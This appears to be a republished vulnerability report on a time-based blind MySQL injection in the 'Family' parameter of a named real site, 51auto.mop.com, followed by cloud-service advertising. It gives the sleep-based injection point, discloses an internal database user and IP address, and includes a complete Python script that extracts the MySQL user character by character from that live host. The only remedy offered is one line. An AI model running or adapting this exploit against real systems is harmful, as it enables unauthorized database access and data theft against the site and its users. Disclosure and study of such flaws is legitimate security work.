Blind injection of mop sub-station MySQL (with python script)
Mop sub-station MySQL blind Injection
Injection point:
POST http://51auto.mop.com/hclist_/Family=aaa'+(select(0)from(select(sleep(10)))v)+'bbb&file1=1&happyUserId=-
The Family parameter can be injected.
MySQL user:
Appro2@172.31.2.7
Script attachment:
#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport hashlibimport urllibheaders = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36',}payloads = list(string.ascii_lowercase)for i in range(0,10): payloads.append(str(i))payloads += ['@','_', '.']print '[%s] Start to retrive MySQL User' % time.strftime('%H:%M:%S', time.localtime())user = ''for i in range(1, 25): found=False while found==False: for payload in payloads: timeout_count = 0 for j in range(1,3): # 2 times to confirm try: params = { 'Family': "aaa'+(select(0)from(select(sleep(ascii(mid(user()from(%s)for(1)))=%s)))v)+'bbb" % (i, ord(payload)), 'file1': 1, 'happyUserId': '-' } params['Family'] = params['Family'] * 5 body = urllib.urlencode(params) conn = httplib.HTTPConnection('51auto.mop.com', timeout=5) conn.request(method='POST', url='/hclist_/', body=body, headers=headers) conn.getresponse().read() conn.close() print '.', break except Exception, e: timeout_count += 1 time.sleep(0.01) if timeout_count == 2: user += payload print '\n[In progress] now user is %s' % user found = True break print '\nFinally, MySQL user is', user
Solution:
Parameter Filtering
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
